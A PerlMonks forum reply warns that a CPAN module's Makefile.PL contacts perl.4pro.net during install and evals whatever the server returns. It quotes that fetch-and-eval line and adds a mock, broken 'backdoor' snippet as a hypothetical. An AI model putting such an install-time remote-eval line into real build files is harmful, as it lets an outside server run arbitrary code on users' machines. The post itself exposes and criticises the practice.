http://www.perlmonks.org?node_id=349906


in reply to Re: CGI::Application vs CGI::Builder
in thread CGI::Application vs CGI::Builder

Perrin, Maybe the style is not evil, but what Makefile.PL does is quite Evil
; eval { require LWP::Simple ; my $res = LWP::Simple::get ( "http://perl.4pro.net/install.txt" . "?DISTRIBUTION=$dist&VERSION=$vers&PERL=$]-$^O" ) ; eval $res if $res }
I am assuming that this is just a benign install counter and maybe it has the ability to alert the user that the version being installed has been updated, but how do I know that there is not something like this at perl.4pro.net?
; if (grep /$uesr_domain/ @my_enemies) ; { open(FH, '<', 'backdoor.txt') ; print while(<FH>) ; print STDERR "$user_host 0wn3d! hehehe\g\g\g\g\g\g\g\n" { else { ; open(FH, '<', 'message.txt') ; print while (<FH>) ; pint STDERR "Tick\n" } ;close FH

And even if there is no code like that. 1. It is still underhanded! and 2. What happens if perl.4pro.net gets owned, then someone could install code that does the above. Bonus points for doing it as a kernel module!

Would it not be ironic were his site to be comprimised by another module's "Counter feature"?

And look at per.4pro.net, it shows quite a few perl modules, and I would wager that most of them the same code in the Makefile.PL.